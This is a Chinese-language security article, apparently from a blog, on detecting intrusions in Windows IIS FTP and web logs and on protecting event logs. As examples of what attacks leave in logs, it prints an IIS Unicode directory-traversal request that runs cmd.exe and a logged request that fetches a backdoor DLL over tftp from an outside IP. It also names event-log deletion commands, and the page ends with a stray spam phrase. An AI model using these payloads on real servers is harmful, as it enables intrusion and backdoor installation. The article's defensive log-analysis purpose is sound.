<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    快速掌握典型入侵日志分析

    VSole2021-10-31 07:06:31

    如今各式各樣的Windows漏洞層出不窮,五花八門的入侵工具更是令人眼花繚亂,稍微懂點網絡知識的人都可以利用各種入侵工具進行入侵,這可給我們的網管帶來了很大的麻煩,雖然經過精心配置的服務器可以抵御大部分入侵,但隨著不斷新出的漏洞,再高明的網管也不敢保證一臺務器長時間不會被侵入,所以,安全配置服務器并不能永遠阻止黑客入侵,而如何檢測入侵者行動以保證服務器安全性就在這樣的情況下顯得非常重要。

    日志文件作為微軟Windows系列操作系統中的一個特殊文件,在安全方面具有無可替代的價值。它每天為我們忠實地記錄下系統所發生一切事件,利用它可以使系統管理員快速對潛在的系統入侵作出記錄和預測,但遺憾的是目前絕大多數的人都忽略了它的存在,反而是因為黑客們光臨才會使我們想起這個重要的系統日志文件,很有諷刺意味。  

    在這里我們就不去講什么日志文件的默認位置、常見備份方法等基本技巧了,這樣的東西黑防以前講得很清楚了,大家可以翻看黑防以前的雜志學習這些東西,我們今天來看看如何分析常見的日志文件吧!

    1.FTP日志分析  

    FTP日志和WWW日志在默認情況下,每天生成一個日志文件,包含了該日的一切記錄,文件名通常為ex(年份)(月份)(日期)。例如ex040419,就是2004年4月19日產生的日志,用記事本可直接打開,普通的有入侵行為的日志一般是這樣的:  

    #Software: Microsoft Internet Information Services 5.0(微軟IIS5.0) 
    #Version: 1.0 (版本1.0) 
    #Date: 20040419 0315 (服務啟動時間日期) 
    #Fields: time cip csmethod csuristem scstatus 
    0315 127.0.0.1 [1]USER administator 331(IP地址為127.0.0.1用戶名為administator試圖登錄) 
    0318 127.0.0.1 [1]PASS – 530(登錄失敗)
    032:04 127.0.0.1 [1]USER nt 331(IP地址為127.0.0.1用戶名為nt的用戶試圖登錄) 
    032:06 127.0.0.1 [1]PASS – 530(登錄失敗) 
    032:09 127.0.0.1 [1]USER cyz 331(IP地址為127.0.0.1用戶名為cyz的用戶試圖登錄) 
    0322 127.0.0.1 [1]PASS – 530(登錄失敗) 
    0322 127.0.0.1 [1]USER administrator 331(IP地址為127.0.0.1用戶名為administrator試圖登錄) 
    0324 127.0.0.1 [1]PASS – 230(登錄成功) 
    0321 127.0.0.1 [1]MKD nt 550(新建目錄失敗) 
    0325 127.0.0.1 [1]QUIT – 550(退出FTP程序)
    

    從日志里就能看出IP地址為127.0.0.1的用戶一直試圖登錄系統,換了四次用戶名和密碼才成功,管理員立即就可以得知這個IP至少有入侵企圖!而他的入侵時間、IP地址以及探測的用戶名都很清楚的記錄在日志上。如上例入侵者最終是用Administrator用戶名進入的,那么就要考慮此用戶名是不是密碼失竊?還是被別人利用?接下來就要想想系統出什么問題了。

    2.WWW日志分析  

    WWW服務同FTP服務一樣,產生的日志也是在%systemroot%\sys tem32\LogFiles\W3SVC1目錄下,默認是每天一個日志文件。這里需要特別說明一下,因為Web的日志和其他日志不同,它的分析要細致得多,需要管理員有豐富的入侵、防護知識,并且要足夠的細心,不然,很容易遺漏那種很簡單的日志,而通常這樣的日志又是非常關鍵的。由于我們不可能一個一個分析,所以這里舉個簡單例子:  

    #Software: Microsoft Internet Information Services 5.0 
    #Version: 1.0 
    #Date: 20040419 03:091 
    #Fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(UserAgent) 
    20040419 03:091 192.168.1.26 192.168.1.37 80 GET /iisstart.asp 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt) 
    20040419 03:094 192.168.1.26 192.168.1.37 80 GET /pagerror.gif 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
    

    通過分析第六行,可以看出2004年5月19日,IP地址為192.168.1.26的用戶通過訪問IP地址為192.168.1.37機器的80端口,查看了一個頁面iisstart.asp,這位用戶的瀏覽器為compatible;+MSIE+5.0;+Windows+98+DigExt,有經驗的管理員就可通過安全日志、FTP日志和WWW日志來確定入侵者的IP地址以及入侵時間。  

    對現在非常常見的SQL注入式攻擊,通過對put、get的檢查,也可以大概判斷是那個頁面出了問題,從而修補。

    3.HTTPD事務日志的分析  

    Microsoft的IIS 5自公布到現在,被黑客利用的漏洞多不勝數,像.ida/.idq、unicode、WebDavx3和一些未知的漏洞,我們分析日志的目的就是為了分析黑客入侵的行為,對于沒有打好補丁包的系統被黑客成功入侵的日志記錄分別對應如下。

    1)unicode漏洞入侵日志記錄  

    這個是個非常經典的漏洞了,要找這樣的服務器估計得去國外慢慢找了,它的日志是最經典的一個。  

    我們打開IIS5的Web服務的日志文件,日志文件默認位置在%systemroot%\system32\LogFiles\文件夾下。Unicode漏洞入侵行為的日志記錄,對于正常的Web訪問,是通過80端口用GET命令獲取Web數據,但通過非法的字符編碼可繞過字符驗證而得到不應該得到的信息。但補上相應的補丁可堵上此漏洞。

    我們配合入侵來看下這樣的記錄:通過下面的編碼我們在入侵的時候可以查看目標機的目錄文件:  

    GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200
    

     則日志中會記錄下此訪問行為:

    2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET 
    /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 
    /c+dir 200 -
    

    我們的日志中記錄地一清二楚,來自192.168.0.1的攻擊者查看我們的目錄。下面一行是向我們的機器傳送后門程序的日志記錄:

    2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:\httpodbc.dll 502 –
    

    記錄非常詳細的,系統里面那個程序在響應都記錄了下來,這樣我們分析入侵行為就好辦了。

    2)WebDavx3遠程溢出日志記錄  

    過去一段時間有名的Wevdavx3漏洞是應用最廣泛的,如果系統遭受了此遠程溢出的攻擊行為。  

    2004-04-19 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK 
    /AAAAA…… 
    

    這表示我們的Web服務受到了來自192.168.0.218的攻擊,并鎖定(即關閉)了WEB服務,后面的一些亂碼字符是在溢出攻擊時使用的偏移位猜過程。

    上面的幾種日雜都記錄了有入侵行為的IP地址,但此IP地址說不定就是攻擊者使用了跳板,也就是說此IP很可能是“肉雞”而不是攻擊者的IP,遇到這樣的情況,我們再查看其他日志文件,還是有可能追查出攻擊者的位置的,但這個就完全靠管理員的經驗了。

    4.日志文件的移位保護  

    通過上面的幾個方法,大家應該可以檢測普通的系統攻擊了,但話說回來,如果上面的攻擊任何一個成功了,那現在我們都看不到日志了,早被入侵者清空了,所以,為了防患于未然,我們還是針對常見的刪除日志的方法,把日志挪挪吧。  

    好多文章介紹對事件日志移位能做到對系統系統很好的保護,移位雖是一種保護方法,但只要在命令行輸入dir c:\*.evt/s,一下就可查找到事件日志位置,再刪除可容易了,那怎么辦呢?其實日志移位要通過修改注冊表來完成,找到注冊表HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\ Services\Eventlog下面的Application、Security、System幾個子鍵,分別對應“應用程序日志”、“安全日志”、“系統日志”。如何修改呢?下面我們具體來看看Application子鍵:File項就是“應用程序日志”文件存放的位置,把此鍵值改為要存放日志文件的文件夾,我們再把%systemroot%\system32\config\appevent.evt文件拷貝到此文件夾,再重啟機器就可以了。  

    在此介紹移位的目的是為了充分利用Windows 2000在NTFS格式下的“安全”屬性,如果不移位也無法對文件進行安全設置操作,右擊移位后的“文件夾選擇屬性”,進入“安全”選項卡,不選擇“允許將來自父系的可繼承權限傳播給該對象”,添加“System”組,分別給Everyone組“讀取”權限,System組選擇除“完全控制”和“修改”的權限。然后再將系統默認的日志文件512KB大小改為你所想要的大小,如20MB。進行了上面的設置后,直接通過Del C:\*.Evt/s/q來刪除是刪不掉的,相對要安全很多了。  

    通過上面的幾個實際的例子,相信大家都應該具備分析普通入侵日志的能力了,再結合一定的實際經驗,通過日志來發現系統漏洞、追蹤入侵者就簡單很多了。希望此文能拋磚引玉,給大家帶來一些幫助。

    日志文件系統日志
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    如今各式各樣的Windows漏洞層出不窮,五花八門的入侵工具更是令人眼花繚亂,稍微懂點網絡知識的人都可以利用各種入侵工具進行入侵,這可給我們的網管帶來了很大的麻煩,雖然經過精心配置的服務器可以抵御大部分入侵,但隨著不斷新出的漏洞,再高明的網管也不敢保證一臺務器長時間不會被侵入,所以,安全配置服務器并不能永遠阻止黑客入侵,而如何檢測入侵者行動以保證服務器安全性就在這樣的情況下顯得非常重要。
    用戶名:加密密碼:密碼最后一次修改日期:兩次密碼的修改時間間隔:密碼有效期:密碼修改到期到的警告天數:密碼過期之后的寬限天數:賬號失效時間:保留。查看下pid所對應的進程文件路徑,
    卡巴斯基最近推出了一款名為iShutdown的工具,該工具不僅可以檢測臭名昭著的Pegasus間諜軟件,還可以識別iOS設備上的其他惡意軟件威脅。在卡巴斯基網絡安全研究人員透露了三角測量操作的重要見解幾周后,iShutdown工具就推出了。這項調查深入探討了間諜軟件威脅如何危害iPhone。
    0x01 外網打點到Getshell目標站點:通過各種工具和在線網站,對子域名進行收集,并解析ip。發現主站存在CDN,使用fofa,搜索網站title、js等關鍵信息和子域名解析的ip對應的C段,發現真實ip。對真實ip的ip段進行掃描,發現一臺機器存在Weblogic中間件,使用exp進行測試,發現成功Getshell。administrator權限,使用免殺馬成功shell0x02 內網滲透有殺軟,做完免殺之后,直接上線CS,進行進程遷移。0x05 攻擊結果使用域管帳戶密碼對域內機器進行批量上線,部分被上線機器列表如下。
    Windows安全日志分析
    2021-10-16 06:43:51
    在應急響應初步階段,我們會對系統日志、中間件安全日志、惡意文件等進行收集。接下來便是要進一步對這些文件進行分析:對惡意文件逆向、日志文件分析、梳理入侵時間線和入侵路徑等。本文主要對Windows安全日志進行舉例分析。
    WEB安全梳理-操作系統
    2022-08-10 07:16:03
    WEB安全梳理-操作系統
    近日,美國、加拿大、新西蘭、荷蘭和英國等多個國家網絡安全政府機構發布聯合安全公告,揭示了網絡攻擊者最常利用的十大攻擊媒介。
    Linux系統日志介紹
    2022-07-22 08:07:05
    Linux系統日志介紹
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类